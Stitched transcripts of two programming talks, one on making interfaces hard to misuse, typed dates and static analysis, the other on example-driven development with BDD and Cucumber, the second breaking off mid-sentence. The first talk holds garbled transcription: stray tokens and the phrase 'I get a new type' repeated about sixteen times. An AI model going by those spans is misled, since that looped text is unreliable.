words, we know exactly when objects will be either destroyed or finalized. And that's specified by the language semantics. Java and Csharp, for example, they don't have this feature, although Csharp has a using statement which approximates it. Unfortunately, callers have to remember to use it. So if callers forget to use using, then the automatic mechanism for making sure that things get released doesn't kick in. At the same time, reference counting schemes have trouble with cyclic structures, so reference counting is not the solution to every problem either. But that's a separate issue. The fundamental idea is get away from interfaces that require that people release resources they acquire, and whenever you can come up with a way to do it, replace them with interfaces where the resource release is automated so that clients don't need to worry about it. How you implement it often will be reference counting, but that's not the only way to do it. Moving aside the details of all of this, I told you earlier that it is not uncommon for systems to be fairly complicated, and you have to move the complexity around somewhere so that somebody has to deal with it. What you want to do is minimize the number of places where resource management needs to occur. Hide it from as many people as possible, which is just an example of whenever it's possible, you encapsulate the tricky stuff. So if there's a way for an error to occur, try to design that error so that it's only something which can be made by as few people as possible, ideally you're going to hide it inside a class or inside a function, so only the class implementer or the function implementer has to worry about it. In terms of preventing resource leaks, one thing you can do is C++'s idea of what is unfortunately called resource acquisition is initialization, which says that constructors acquire resources and constructors release them. The whole idea is that constructors are responsible for releasing resources. There are other ways to do it though. For example, let us suppose what I want to do is make it possible for someone to be able to write some data to a file. It doesn't sound very complicated. Let's write data to a file. What do I have to do? I have to open the file, write the data, I have to close the file, which means I can forget to close the file, which means I can't count and I can close the file more than one time. That's an error prone design. If I open the file, I essentially have a resource, I have to release the resource. What I could do is encapsulate that in a function called write to file. I could say, here's a function write to file, that's the name of the file I want to write to and this is the data that I want to write. Now all a client has to say is, I want to write this data to this file. It is now up to the implementer of write to file to open the file, write the data and close it. But as a result, the client doesn't have to think about opening and closing files. Or let's suppose I want to make it possible for somebody to easily acquire a lock, do some work and then release the lock. Because I don't want to have them have to remember to release the lock when they're done. I write a function called do locked work. This is the object that needs to be locked and that's the function that should be called on the object once it has been locked. So as a client, I simply say do this to that object in a thread safe fashion and this function do locked work takes care of it. These kinds of interfaces are nice for avoiding usage errors. They don't necessarily replace lower level interfaces as an example. If I have a whole bunch of different things to write to the file, I don't really want to open the file, write a line, close the file, open the file, write a line, close the file, open the file, write a line, close the file. That would be very inefficient and in a multi-threaded environment it could leave to interleaving problems which wouldn't even be correct. Similarly, if I have several things which need to be done to a particular object under the same lock, I don't really want to get the lock, do some work, release it and then get the lock again, do some work and release it again. It might be inefficient and it might not have the right behavior. So I probably do need lower level APIs that will give me the ability to expressly manage the resources. But what I want to do is I want to advocate these kinds of interfaces, make them very well known to my clients. I want to give them especially beautiful names so that they're attractive and people want to use them. And the lower level APIs, I want to give really ugly, gross, hard to use names that no one wants to type to discourage people from using them. So I give them the functionality but I'm encouraging them to do things the easy way that is less error prone and I'm discouraging them from doing things the way that is more error prone. One of the nice things about programmer discretion is that someone like Waterid often will seek the easiest path to where it needs to go. You can also do things like have one high level object that manages multiple resources. So for example, if I have some work to do which requires opening a bunch of files, doing some work and then closing all of the files, this means I have to remember to close all of those files. So maybe what I want to do is have a multi-file object where a multi-file object actually opens and closes files as a group. So now it may be the case that clients still have to remember to expressly tell the multi-file object, okay, I'm done with you, it's time to be closed now, but instead of having to remember to close N files and release N resources, now they only have to remember to release one resource. Fewer things for them to remember, fewer opportunities for making errors. As long as we're on the topic of resource leaks because it is an important topic, something else you can do is augment prevention with detection, typically you can't design all possible resource leaks out of a system. When you can't design them out of the system, resource leaks tend to be hard to track down. So what you can do is build auditing support into your resource managing classes. You can therefore figure out who acquires what, so for example, maybe which thread acquires what or which function is making certain calls. This will then allow you later to find out who acquired what at what point and failed to release it, which allows you to detect leaks as soon as possible. Fundamentally, aggressive detection helps prevent leaks from making their way into software production. So that's the story on resource release. Something else you can do to make interfaces easy to use correctly and hard to use incorrectly is to document your interfaces before you implement them. This is a wonderful way to find out about resource problems, excuse me, about interface problems. If you find that it is unpleasant to explain how an interface works, it's going to be really unpleasant to use. So just by describing what the interface is going to look like and how it's going to be used, this can make it much more likely you'll design a good interface in the first place. Some of the things we've talked about become pretty obvious. If they're surprising or under specified behavior, surprising behavior, you're going to have to document. You're going to have to say, be aware that if blah, blah, blah, you want to be able to eliminate that kind of comment. You shouldn't have to make those kinds of comments about interfaces. Bad names, inconsistencies in names or in layouts, opportunities to leak resources, all of these things tend to become more visible if you document the interfaces before you actually write them. This is consistent with test-driven design, which we'll talk about later on this afternoon. One of the most important things that you can do to improve the quality of your interfaces is to introduce new types. Assuming you are working in a strongly typed language, the type system is an unbelievably powerful weapon in preventing people from making certain kinds of mistakes. Let us consider something like, I have a class for representing dates in time. Here's a date class. The month is an integer, the day is an integer, the year is an integer. The first thing to notice is that because these are all integers, it is impossible for the compiler to tell the difference between a month, a day, and a year. That means it's really easy for people to pass things in the wrong order. Dates are particularly susceptible to this because in the United States we typically do month, day, year, whereas in other parts of the world it does day, month, year. That's an easy kind of mistake to make. There's a generalization of this. Any function interface, which has two parameters of the same type that are adjacent to one another, means that if you swap the order for some reason, the compiler will be unable to tell. If you have any function interfaces, which take two parameters of the same type or of compatible types that are adjacent to one another, you inherently have the problem that people could call by passing parameters accidentally in the wrong order. You would then want to consider finding a way to eliminate those two adjacent parameters that are of the same type. What we can do in this particular case, which would also solve the general problem of having two parameters adjacent to one another, is to turn day, month, and year into classes. Now I'm doing the minimal possible work in C++ to make this work. I've just said, okay, day is now a type, month is now a type, and year is now a type. I haven't made them full-blown classes. I haven't done any encapsulation. I just told the compiler that they're different types. Now I can say, okay, here's my day class. I have a month object that comes first. I have a day object that comes second. I have a year object that comes third. Now there is no ambiguity. It is now impossible to pass parameters in the wrong order, and as a bonus, the calling code is clear. So if I say, date D of 4, 8, 2005, well, this is not going to compile because the types are wrong, but if I say the month is 4, the day is 8, and the year is 2005, then that will compile. So it eliminates ambiguity, and it makes the calling code a lot clearer as well. This approach only works if you actually create distinct types that the compiler views as being separate. Now in C and in C++, at least, you can do type defs. So you can say, okay, when I say int, excuse me, when I say day, I mean int. When I say month, I mean int. When I say year, I mean int. Now I can say the date is month, day, and year, and now I can say, okay, the great, the day is 4, the month is 8, the year is 2005, except that's wrong. I really wanted it to be the month was 4 and the day was 8. The problem is that although the source code looks pretty, the types are all the same. This is what I call programming to make you feel better about yourself. You don't actually improve the quality of the code. It's more readable, but it doesn't prevent mistakes. In case you want to know why I have this fixation on April 8, that's the day we got our puppy, Darla, who's not quite so small anymore. Now Darla is adorable. That's the most important thing in this entire seminar, is that Darla is adorable. But it's still possible to use the interface incorrectly. For example, somebody could say, okay, the day is 8 and the month is minus 4 and the year is 2005. Well, obviously the month is not minus 4. Well, you might say, look, no one is going to say the month is minus 4. Actually, I can think of two ways, plausible ways you might end up with a month of minus 4. One of them is someone's hacking your system and trying to break it. It's a security issue. That's one possibility. The more interesting possibility is they didn't write minus 4. What they wrote was something like x minus y, when what they should have written was x plus y, or some other simple typo in expressions. In other words, they meant to get it right, they just made a mistake. This doesn't solve all of your problems. All right, let's eliminate invalid months. There's only 12 months. What we can do is we can enforce that constraint. We're going to make month a real class. We're going to declare 12 immutable month objects. We're going to limit the creation of month objects to copies of those values. In C++ it would look like this. Here's a month class. I have static objects for January through December. Then I have the constructor for month from integer is declared private. This prevents people from creating new months. This prevents people from creating uninitialized months. The point is I'm making it so that people can only use one of 12 possible values. Then we initialize all these month objects to make sure that they have the appropriate integer inside them. The result now is better. If I try to say, okay, the month is minus 4, this won't compile because you can't call this constructor. Instead, you have to say the month is, oh, it's month colon colon April. We take advantage of the fact that we know there are only 12 possible values. We enumerate those values and then we eliminate the possibility of using anything other than those specified values. We haven't eliminated all the problems because now we've got the possibility of saying, okay, the day is 71. I don't know of any months with 71 days in them. If I wanted to make it so that the day and the year were impossible to get wrong, if you're willing to work out it hard enough, you can do it. For example, I might say, okay, I'm going to create a year object and then from the year objects, I'll get month objects. Then from the month objects, I will get day objects. They will only give me objects corresponding to valid days in the valid month of the valid year. You can clearly do that. Now that's not what I'm advocating. I'm not saying everybody should go out and create year objects and month objects and day objects that enforce these kinds of constraints. My experience has been that in many cases, people don't think about how interfaces can be used incorrectly. I believe when you design an interface, it is a very important exercise to say, okay, here's my prospective interface. How could people innocently use it incorrectly? How could they accidentally make mistakes? Once you have identified how they could accidentally make mistakes, then what you can say is, all right, how much work would it be for me to change the interface so that the mistake becomes impossible? After you've done that analysis, you're in a position to say, okay, this is how common I think the mistakes are and this is how serious the implications are if the mistakes occur. This is how much work it's going to be for me to change things so that the mistake becomes impossible. Now you can make an engineering judgment to say, is this more important or is this more important? What the right answer is will depend on your particular circumstances. The important thing is to recognize that you have created an interface which could be misused and to ask yourself, could it be revised so that it cannot be misused? The sessions run for an hour at a time, but this is the session right after the lunch break. I'm assuming you've got a heavy meal floating around in your stomach right now. It's a big room. There's lots of people. It's warm. I'm talking about software. This is what we're going to do. We're going to take a break for five minutes right now and it's just going to be five minutes. There's not a lot of room, but you can at least stand up and try to get your blood circulating. Those of you who want to can go and try to get as much caffeine as you can possibly consume in five minutes. We'll start again in five minutes. This is very nice. I've got a drop down. Drop down is very empowering. Make me feel like I can't possibly choose the incorrect date except that I chose an incorrect date. It's not fair to pick on Lonely Planet because actually it turns out that Lonely Planet has a wide variety of ways to make mistakes. This is all from Lonely Planet. It turns out that if you want to fly somewhere, you actually don't even have a drop down. All you have is a widget you click on, which is great. It brings up a calendar and you can only choose valid dates. That's wonderful. That works really well. If you want to find a hotel, then all you have is a drop down and a widget. You have a choice as to whether you want to get it right or you want to have the risk of getting it wrong. Speaking of choice, when you want to run a car, the only possibility is a drop down. Wait. Did I talk about consistency yet? Have I mentioned the importance of consistency? Here we have three essentially identical operations at the same website with three different interfaces. Some of them allowing some kinds of mistakes and other ones not. This is the kind of thing you would like to avoid if you possibly can. Constraining values, such as saying there's only 12 possible month's objects. That's a legitimate technique. To be honest, it is not that common to have a relatively restricted universe of values that you can therefore prevent people from using other possible values. The more general technique is introducing types. I did some work with a company. They make slot machines, these lovely automated things whose sole purpose in life is to separate you from as much money as possible and somehow leave a smile on your face. It's an interesting industry, actually. One of the techniques that they use to make sure that you will keep on playing to lose all of your money is to give you bonus money so you feel like you've gotten money for free. The problem is it's really important to them that the bonus money never leave the machine as real money. The bonus money is only there to keep you playing so you lose more of the real money. Under those conditions, it makes a lot of sense in their software, and they ultimately did do this. They have a type called something like real money and a type called something like bonus money, and they have various operations for combining them together and adding them and showing totals and stuff, but under no conditions can bonus money ever be converted into real money. As another example, we know from studying engineering and physics that if we have units like time and mass and distance, then you can't arbitrarily combine them. But an awful lot of software that is representing things like time and mass and distance actually only programs in terms of floating point numbers. Maybe they use type diffs or something like that to make them feel better about themselves. What we would like to do is make sure that unit conversion errors are impossible. I'll talk about that a bit more in a moment. First I want to mention everybody's favorite type is string. That's not true. Everybody's favorite type is int. The problem is the int is meaningless. Int means I've got a number, but we don't know. As someone's age, a street address, number of times we've circled the moon, I don't know. It's a number. String is the equivalent thing. If I say I have a string, that is effectively meaningless. You might as well not even be using a type if you say something as type string. A filename, for example, should be different from a customer name, and they should both be different from a regular expression, which really is a different kind of thing. Printer name should be different from driver name. That's not my observation. That is the observation of a client I worked with one time that spent a huge amount of time debugging a problem where driver names and printer names were both represented as strings. They only differed in terms of the last three characters of the name, and debugging that was not terribly pleasant. Since you have different types, if I know I have a customer name, or if I know I have a driver name, or if I know I have a regular expression, or I have an address, once I know what it represents, and that's encoded in the type system, then I can start doing type-specific validation. I can do type-specific printing depending on what it is that I have. If all I have is just a string, and I have no idea what it is, it's essentially useless information. Printing is very convenient, but it doesn't carry any real type information. I'm advocating the idea that you can eliminate certain kinds of client errors by generating new types. In many cases, the types are going to be written by hand. Under some conditions, you may need to generate the types automatically. This is a case where you can do this using template metaprogramming in C++. As an example, do<|id|><|translate|> let us suppose what you are dealing with are things like mass, and distance, and time. The normal units that you deal with in physics and engineering applications. The problem that we have is that the number of possible types is, in principle, unlimited. For example, if I have mass and I multiply it by mass, I get a new type, mass squared. I get a new type. I get a new type. I get a new type. I get a new type. I get a new type. I get a new type. I get a new type. I get a new type. I get a new type. I get a new type. I get a new type. I get a new type. I get a new type. I get a new type. I get a new type. I get a new type. A lot of the things I have just talked about can also be caught by testing, for example, or during debugging. The thing is that static analysis is more reliable because static analysis should not miss any paths. Testing in non-travel systems is typically not going to be able to cover every single path. Static analysis can analyze them all. Furthermore, static analysis incurs no runtime cost because it occurs prior to runtime. As a result, if you can guarantee that certain conditions cannot occur because static analysis has ruled out the possibility, you can eliminate the runtime checks for those conditions and you can eliminate the error handling code when those conditions arise. You can make your program a little smaller and a little faster simply by having ruled out the possibility of certain kinds of mistakes. There are a whole bunch of different kinds of static analysis. What I want to do is just introduce you to the variety of forms of static analysis. We're going to start with compiler warnings. Compiler warnings are about the lowest of the low-lying fruit when it comes to static analysis. This is the situation. It is highly likely that compiler writers know the language better than you do. Highly likely that that is true. As a result, you should pay attention to their warnings. It's an interesting thing about compiler writers. In my experience, compiler writers view their job as taking a valid source program and generating the best possible object code from it. That's their job. Their job is not to babysit you and find a lot of mistakes, except for in certain parts of GCC. Generally speaking, they take a valid source program and they produce an object code. If they take the time to issue a warning, it is highly likely that it is a relevant warning because, number one, they don't view issuing warnings as their job. Number two, they understand that many of their clients work in an environment where they are required to compile without getting any warnings. If they issue a warning, that means somebody somewhere is going to get really upset and have to change some code. Generally speaking, compiler vendors don't issue a lot of warnings. If they do issue a warning, usually it is meaningful. You should therefore try to compile cleanly at maximum warning level. Actually you should try to require compiling cleanly at maximum warning level, if you can. Not everybody has the luxury of that. At the same time, you do not want to become dependent on compiler warnings, especially in languages like C and C++ with multiple compiler vendors that behave slightly differently. It is possible to find different compilers that warn about different things. Your code can sail through one compiler with no comment at all and get warnings from other compilers. Also different compilers may issue warnings under differing conditions. You don't want to become dependent on the existence of compiler warnings. This is a problem I run into in practice all the time where someone will say, I don't need to remember that because if I make that mistake, the compiler will warn me. Then I have to point out, yes, but I know another compiler that doesn't issue a warning and if you end up porting your code to a different platform, for example, you may run into this problem. So let us look at a really small piece of C code described as an extremely small piece of bad C code. This is from an article from a number of years ago. So here's the code. Under GCC 3.2.3 with the default compiler options, that compiles cleanly. No warnings. However, if you turn on full warnings, while it says, okay, too few arguments for format, control reaches the end of a non-void function, I mean, this is giving you some really information. Wouldn't you like to know that you don't have enough arguments in your format specifier? Seems vaguely relevant. All you had to do was ask this particular compiler to tell you the things that it recognized was wrong with your code. So if it's just a matter of enabling a particular command line option, it seems like you definitely would like to be able to do that. It doesn't get a lot easier than that. The next step up after turning on compiler warnings is lint and similar utilities that read through your source code. Now, lint and similar utilities, their only job is to issue warnings. They don't generate object code. So their only reason for existence is to try to find things which might be mistakes. So they check for things like constructs with unexpected behavior. For example, if you test floating point numbers for equality, most people have learned at one point or another that just because I have two mathematical expressions which are mathematically equal does not mean that if I translate that into source code and run it, I'm going to get two bit patterns that are identical, but checking floating point numbers for equality checks the bit patterns. So that's a nasty little trap to fall into as I can testify by the nine hours I spent one time trying to figure out what the problem was. Placing mandatory cleanup in a Java finalizer, for example, if it's mandatory, finalizers in Java aren't always called. So putting mandatory stuff there, bad idea. Potential concurrency problems, for example, invoking thread.run instead of thread.start in Java. In Java concurrency in practice, they say that static analysis tools are an effective complement to formal testing and code review. Or potential security risks. For example, requesting read write file access when you only need read only. Making unchecked writes to fixed size buffers. Gary McGraw in the security industry, he says that static analysis tools is number one of seven touch points of secure software. So recognize as being able to find really interesting problems with your code. Couple of other things that can be identified. One of them is unportable code, for example, use of compiler specific extensions or dependencies on evaluation order in languages where the evaluation order is not completely nailed down. Likely maintenance problems like overly complex expressions or failure to follow naming conventions. As I already mentioned, lint-like programs are typically a lot more aggressive than compilers. Traditionally, lint-like programs have required a non-trivial investment up front to get them configured to the point where they can do something useful. Especially for large legacy systems. It's very, very common that if you get a brand new lint-like tool and you deploy it for the very first time and you have a large code base, in many cases you will be inundated with hundreds of thousands of warnings. And you will be trying to figure out, actually you'll be trying to figure out how do I uninstall the static analysis tool because you just can't do anything with hundreds of thousands of warnings. Output filtering helps a lot, but you're going to have to set aside time for initial configuration. Now, this is sort of the traditional path for static analysis tools. In the last, let's say, half dozen years, a number of companies have arisen with a different philosophy. Their philosophy has been, we are going to issue almost no warnings unless we are really, really sure that this is a problem. And their goal is to issue almost no false positives. So what they do is they have a very low false positive rate, but they don't catch as many mistakes. And companies that I've talked to that have used both of them have said, well, you know, it's not exactly obvious what the best solution is because these people, whatever they warn about, usually has to be fixed. That's great. But the problem is there's a lot of other stuff that they need to fix that they didn't warn about. And the first set of tools which give more warnings will bring those other things to light. At the same time, there's a ton of payoffs for using these kind of tools. One of them is reduced debugging time. You have to ask yourself, how long is it going to take me to track down, for example, use of an uninitialized variable? Uninitialized variables are easy to catch with data flow analysis. Tools do it all the time. But if you don't run the tool, you don't necessarily know it's uninitialized. What if you have an evaluation order problem where you think that X and Y are being added before being multiplied by Z, but actually it's in some other order for some reason? Or the order in which operands of a function call were evaluated was different from what you expected? In addition. One of the nice things about using these kinds of tools is that when people use them and get warnings about problems, this helps educate the programmers about the kinds of problems. After you've received a warning six times in a row that if you do this, you could have a problem, we would like to believe you're going to learn you probably should not do that. So it's a way to educate people over time. And by running static analysis tools like Lint, you can identify modules that probably should be looked at more closely either through testing or through general review. And that is because it is an empirical observation that defects in modules tend to cluster, which means that they're not uniformly distributed. If you find a bunch of mistakes in one area, there's probably other mistakes in the same area. So if Lint gives you a whole ton of warnings in one module or two or three files, you should probably be subjecting those files to additional scrutiny because statistically it is likely there are other issues there which require some way of being addressed. There is an interesting thesis that says programmers don't do anything. Don't do something unless they think it will have an effect. It seems reasonable. Programmers don't write code unless they think it's going to do something. So the question is, how can we take advantage of the observation that programmers don't write code unless they think it's going to do something? I will tell you in 20 minutes because that's the time for the break. So we'll start again in 20 minutes. Thank you.
|
Some development practices improve software quality, regardless of the domain of the application, the language in which it's written, the platform on which it runs, or the users it is intended to serve. This seminar explores fundamental principles, practices, and standards that improve software quality, no matter what the software does, how it does it, or whom it does it for. Unlike most treatments of software quality, this seminar focuses on the critical role that programmers play, and it discusses specific strategies applicable to their activities.
|
10.5446/51510 (DOI)
|
Hello, is that better? Okay, great, thank you. Welcome, thanks for coming along. I'm going to be talking about growing software from examples. So this is a session that's come from, I practice BDD using Cucumber as part of my day job. I go in and train people about that. And I'd noticed over time that there are a lot of other techniques out there, ATDD, TDD, specification by example, many other things. And I was wondering to myself, what is it that makes them different? Are they the same? Are there similarities? Should I know more about all the other ones? Should I pitch my training for specific audiences for specific reasons? And so really it's just a question of, you know, what's going on here? Are there many things that we need to learn? Or are there just too many words and names out there? So it didn't actually bother me that much for most of the past couple of years, until I was wandering around on the Internet doing research before one of my engagements. And I came across this document. This is just a part of a document. It's by a guy called Mr. Bradley. And it purported to show you when you should use each of the techniques that I was just describing. It's quite a long document. This is just an excerpt from it. But it had a checklist that was trying to describe what situations, specification by example would be useful in, what situations behavior-driven development would be useful in, etc., etc. And it just felt wrong to me. I didn't think that these things were significantly different. I didn't recognize the context that this guy was describing. And in fact, I thought this was a really bad document. I felt very strongly about this. I commented. I wrote to the guy. I haven't actually received a response. But it led me to think more deeply about what is the market about? Why are there so many different terms going around for what seems to be a similar type of activity? Now, like many people, I have read this book by Nat Price and Steve Freeman. I wonder if I can get a show of hands. It's really difficult to see. Who's read this book? Okay, a few of you. Maybe I should go back a step. How many developers have I got in the audience? Loads, okay. How many testers have I got? Okay. Welcome. So this book is a book designed, aimed at programmers. It's a book written using a Java application as an example. But I don't think it's certainly not a book that's restricted to Java programmers. I recommended it and given it to C sharp developers, dot net developers and also C++ developers. And I think I can go, I'd go as far as to say that it was the most important book I read in the year that it came out. And it still sits with me as the most important book of the decade that it came out in. It was concise. It was clear. And it showed how you didn't need any of these fancy tools. You didn't need Cucumber. You didn't need BDD. You didn't need new names for things. There were some principles about how you went about developing software, thinking about how it was going to be used. Thinking about the low-level architecture of it, which would design, drive it from tests, using the tests, nameable names of tests that were really easy to understand. And all in all, this was a book that actually changed the way I thought about developing software. Just as a little aside as we go in, while I was searching for the image for this book, for the slide, I just went to Google as you do for images. And I found a few other books that are available that are also that fit in the Goose mold. This is a wonderful book that prints, people reuse serial packets and they print the book on the side of the serial packet that's blank. There's a Goose book that's about the mafia in Chicago. And there's even a Goose book about doing chemistry experiments in your kitchen. So there's plenty of Goose books. Only one of them is about software development. So one of the diagrams that's in this book is the, you know, it's a classic description of the TDD Red-Green Refactor cycle. Is this familiar to people? Are you all happy with this diagram? Let's have hands if no one's seen it before. Right, so most people have seen this and, you know, it's fairly straightforward. It's part of our TDD way of working. It's been around since XP, if not before that. And we know that we write the test, it fails, we make it pass, and then we refactor or clean up. So what that price in Steve Freeman's book did for me is it introduced the larger loop outside, the loop where you can actually do a failing end-to-end test, or failing acceptance test. And once you've got that acceptance test failing, then you dive down into a lower level loop, the TDD loop, and you go round and round in this way, driving the development of your system from the externally observable behavior of the system, rather than already thinking about the code. Now, this is classic behavior-driven development. This is classic test-driven development. This is common to all of the approaches that I was listing beforehand. We're talking about examples driving out the system from the outside in, from its behavior. And so this is one of the diagrams that we use to try and get this across. When you're thinking about trying to implement something, you don't start thinking about what algorithm you're going to use. You don't start thinking about if and else clauses in the middle of your code. You start thinking about what you need to provide to your end user, to your customer, what the capabilities and the features that you're going to be offering. So you work from outside moving in. And it's also very common to use examples. So all of those mechanisms that I was showing at the beginning use examples. They may call them different things. They may call them tests. They may call them acceptance tests. They may call them specifications. But what they are, they're examples of how the system is going to work. This is a, I lifted this from Brian Marrick's website. Brian Marrick, one of the signatures of the Agile Manifesto, runs a website called exempla.com. And his catchphrase is an example would be handy right about now. So basically it's been recognized for many years that examples are a great way for people to sit and discuss how a system is going to work. And when you sit people around a table and you start coming out with concrete examples, people begin to propose other examples. And it gets them thinking about how the system is going to work. It gets them thinking about edge cases. It gets them thinking about exceptional situations. It gets them thinking about exactly what it is that they're trying to deliver. So, I mean my premise to start with is that all of the techniques or methods work from the outside in. They all use examples and they all write or at least think about the examples before you go about developing the system. So already I'm, you know, you see where I'm coming from. I think these techniques are related if not identical. So what I'm going to do now is I'm going to go through a number of other examples of things that I think we do when we're developing systems of software using examples. And try and see if there are any differences between the different mechanisms. So I guess the first thing that I want to talk about is the fact that examples, tests, specifications, they're not just throw away things. You don't write them and then forget about them once you develop the system. They're documentation. They're requirements. They're just in time for you to do the development. So the idea is you don't go and write a load of examples three months before you start developing the system and have people sign off on them. You have, you develop these examples as you're doing your discovery, as you're doing the development of your system. So all of the mechanisms, specification by example and ATDD all work in the same way. You pull an example, you discuss it, you maybe get some more examples and these turn into the requirements of your system. And they illustrate the acceptance criteria, the rules, the stories. Another wonderful thing about the examples if you're using Cucumber or JBehaviour Fitness or one of these tools to implement them is that they become living documentation. So one of the real issues that we have in software development with big requirement documents is that they're typically always out of date or wrong. We know as developers that we've often gone back to pieces of code that have comments in them and the comments are no longer true. And that's because the compiler doesn't enforce the correctness of comments. It requires us to update them when we change an API, when we change the name of a method, when we change its arguments. Whereas examples that are executed against your system, they act as a living documentation because they will fail if they are no longer correct. And at that point you know that either your system is broken or your documentation is out of date. So you get some real benefits from having a living documentation that continually affirms that your specifications, your documentation are up to date and correct. Now none of these mechanisms actually mandate you to use any automation tools for running your examples. So this is something you get from using an automation tool such as Cucumber or JBehaviour. However, all of the example mechanisms that we're talking about allow you to write your examples, your specifications using tools of this nature. Another great benefit of discussing these examples among a number of different stakeholders is that you begin to develop ubiquitous language. So ubiquitous language means that we have a way of discussing the domain, the problem domain, that is understood by all of the stakeholders that are participating in the discussion. So in a lot of the techniques, certainly in the BDD and ATDD realms, people will recommend that you have representatives from your test department, representatives from your development department, and representatives of your product, owner or business analyst sitting around together discussing these examples. And while you're doing that, you will have to be communicating on a level that everyone can understand unambiguously. Now this is, already this is a huge benefit that every one of these ways of working delivers. I've lost count of the number of times I've gone into organizations and I find that one group of people uses a word in a different sense from another group of people. I was in an insurance company a few months ago and they used the word versions for their sets of rates tables. However, it transpired that as far as the underwriters were concerned, that was a different concept from the concept that the developers had. There turned out to be three different usages of the word versions as applied to rates tables. And every time someone used the word versions, they either assumed they understood the context or they had to then go through another discussion about which sort of versions you're talking about. This sort of thing, if you just write it in a requirements document and pass it to the next person down the line, doesn't surface until much, much later on. If you're all sitting around a table using concrete examples to discuss your requirements, it comes to the surface very quickly and you can arrive at your ubiquitous language, a way of communicating among yourselves within your team in an unambiguous way. I was talking about living documentation. So Matt Wynn, who is one of the authors of the Cucumber tool, has been working on this project called Relish, which takes Cucumber files and publishes them as readable hyperlink documentation. So you can use it as your specification manual. It's presented in a format that is very easy for people to read. And just to demonstrate that it's not just a pipe dream that it's real, you see that this is in fact an example coming off the web. And it's the UK government's digital strategy team who are rewriting the UK government's website. And they have been specifying and implementing this product over the past year and a half in public and it's documented using Cucumber scripts through Relish on the Internet. People often wonder about what sort of examples should we be talking about? You know, am I allowed to use complicated examples? Should everybody be able to understand them? Am I allowed to use concepts about integer overflow in the code or null pointers and so on? And the answer like so many is it depends. It's entirely dependent on the people who are participating in developing those examples, who's going to consume them, who the audience is. So it's down to who's going to be able to read them. It's absolutely fine, I find, for examples to include domain specific terminology. You know, we're not trying to write examples that the man on the street can come in and immediately understand. It's a way for your team to communicate about the requirements of the system that you're developing. So they can be intensely technical as long as the technical barrier is not a barrier to the people on your team. You've got to understand what they're interested in them for. So another problem that people frequently have is that because of these two loops that I described earlier, the outer behavioral loop and the inner TDD loop, people are worried that you're going to get duplication between the TDD loop and the outer loop. Hey, we don't want to test these things twice. And I mean, the first thing to point out is that they're not tests, you know, they're specifications. You're trying to document the system and you're documenting the system for very different purposes. The outer loop, you're trying to document the system so you can talk about its capabilities, about how it's going to work, about what features and capabilities it's going to deliver. The inner loop, you're talking about the technical design, the architecture of the implementation, and they have different audiences. There will be some overlap. And I ask people not to concern themselves overly with this. They have different audiences and they have different levels of granularity. The most important thing about the examples is you need to keep them clear. If people can't understand what's being written, if it's not giving them the value from being able to understand what the system does, then you have missed the trick. So when we think about making things clear, this is an example in Java. I'm not going to be showing too many of these, the code level examples, but this is an example where I'm trying to show that you need to emphasize the details that are interesting without overloading people with the details that are just incidental. So we need to make sure that our examples are focused. When someone comes to an example, they need to be able to bring away the information really quickly about what you were trying to show in that example. So here I'm using the builder pattern to create this customer object. Now, a customer is going to be quite a complex beast. It may not just be one class, it may be a graph of linked objects. There could be any sort of implementation underneath this. But when you're reading the example about referral rules around smokers and non-smokers, you're not really interested in the rest of the customer object. You're interested in whether the person was a smoker or not. So what we're doing here is we're creating the data within the example. So that means that when we come to automate it, the data is under our control. We're not dependent on the next tunnel database. We're not dependent on a service. We're not dependent on live systems somewhere else. So we create the data. We don't want to burden the person reading this example with loads and loads of incidental details, you know, the customer's name, what his salary is, what his job is. This example is around how we handle smokers when we come to try and quote for their insurance needs. And this example, this build-up pattern makes it very clear what it is we are interested in. So incidental details should be hidden. Non-incidental details should be made very clear. And you have to use your subjective judgment, I guess, what's incidental in a particular situation. So if we were dealing with zip codes and postage prices, would the actual zip code be important? Or is it which state does it code relates to that is of interest to the person reading it? So it's about clarity and communication between the stakeholders who are working with these examples. There's also, there's people who come to writing examples from a background in test and often from development have a tendency to write what we call imperative examples, where you talk very much about the interface that you're dealing with and how you manipulate it or you go through a number of steps and make them very clear in the process. And that leads to scenarios and examples that look a bit like this. So this is written in Cucumber. This is, you know, a typical registration and checkout, a registration for an account on a website. And as you can see, there's a list of different elements in there about following a link, entering data into a box, pressing a button, etc., etc., going on like that. And this is imperative. We're ordering the system with what to do. You do this, you do that, you do the other. And this makes it very brittle. So if you get, if you change that interface, if you change the way it behaves, then all of your tests that have long lists of things that have to be done have to be revisited and fixed up. So we try and encourage people to work in a more declarative way. So we're looking for scenarios that tell people about the behavior of the system, not about which interactions you're doing with the various UI elements or API parameters. When you're working in declarative way, again, there's more subjective decisions to be made, because, you know, declarative working can go too far. You can get very declarative, and you're not delivering any value to your customers, to the people who are discussing these examples. So this is a perfectly true statement, but it's not giving you any idea about what the system should do, what the behaviors are. Following on from the imperative listing of many, many different actions with your UI or your API, you get the workflow style. So this happens often when people go to manual tests and try to turn them into examples of how the system should behave. So if you look in your quality center, if your manual test is used quality center, you'll see lists of steps about what the testers need to do to test a particular scenario to reproduce something. And this will be a workflow much in the nature of this, where you, oh, I'm going to go to home page, I'm going to log in, I'm going to put something in my basket, and then I'm going to check out, and then I should check that my purchase details are confirmed. And, you know, this is a long list of things, and this is a workflow that, again, is very brittle and is totally dependent on the way your system is strung together. And when you start changing that, these workflow style scenarios start breaking. These are very important system tests, okay? So there's a place in your system, in your set of examples, for some workflow scenarios. Because, of course, you want to test that all of your components hang together. You do want to test the happy path through your system. You want to make sure that people can actually log in, add items to the basket, check out and get things delivered. But you don't need very many of these. And I'll be revisiting that statement a little bit later on. In general, more of your examples should focus on a single behavior. So this is an example I was talking about earlier, which is to do with the, you know, with the postage price for a particular state in the United States. So here, we're focusing on a single behavior. There's no information here about logging in, adding things to your basket, clicking a checkout link. Because this example is not about that. This example is about calculating the postage for sending something that you bought to Alaska. The first line statement there, the given I am on the checkout page. So I had a discussion about whether you actually need that. But if we are going to have to write the scenario in this format, what's going on behind that given statement is probably all of the things that I just described. It will log in as a registered user, add an item to the basket, say I want it to deliver to Alaska and go to the checkout page. And then the then statement checks that we have the correct postal charge. So we have an example there that does an awful lot of things behind the scenes. It may go through the UI. It may not. It may set up the state of the system using some in-memory object. We have no idea. But what we do know for sure is that it is exercising a particular behavior of the postal charge system. And that's what's important about this example. And it's been made very clear. And if we change the way we implement all of the other parts of the process, the logging in and checking and putting things into baskets, all we have to do is change the implementation of the single given I am on the checkout page statement rather than go through each of our examples refactoring them. And the another thing that I think is common across all of these example based mechanism is that we have to realize that all tests have a cost. And there are benefits from having tests from having examples. There are benefits from automating those examples, but we 